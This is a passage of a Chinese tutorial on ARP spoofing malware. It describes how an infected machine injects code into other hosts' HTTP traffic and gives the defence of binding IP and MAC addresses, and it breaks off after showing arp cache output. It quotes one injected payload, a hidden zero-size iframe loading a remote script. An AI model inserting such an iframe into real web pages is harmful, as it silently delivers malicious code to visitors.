一、ARP欺骗病毒，主要表现为：

    中病毒的机器不仅影响自身，同时也会影响同网段的其它机器，将其它机器的HTTP数据包里加入病毒代码

    代码例子如：

    <html><iframe src=http://xxx.eklajgl.com/lsj.js width=0 height=0></iframe>

    这种病毒危害非常大！即使你机器的安全性做得很好，可是没办法保证同网段的其它机器安全没有问题！

    解决办法：在网关和本机上双向绑定IP和MAC地址，以防止ARP欺骗。

    二、绑定

    1、网关上已经对下面所带的机器作了绑定。网关IP：192.168.0.1　MAC：00:02:03:18:08:00

    2、要进行绑定的Unix主机IP：192.168.0.2　MAC：00:04:61:9D:8B:02

    三、绑定步骤

    1、先使用arp和arp -a查看一下当前ARP缓存列表

    [root@ftp]# arp

    Address                  HWtype  HWaddress           Flags Mask            Iface
   192.168.0.145            ether   00:13:20:E9:11:04   C                     eth0
   192.168.0.1              ether   00:02:03:18:08:00   C                     eth0

    说明：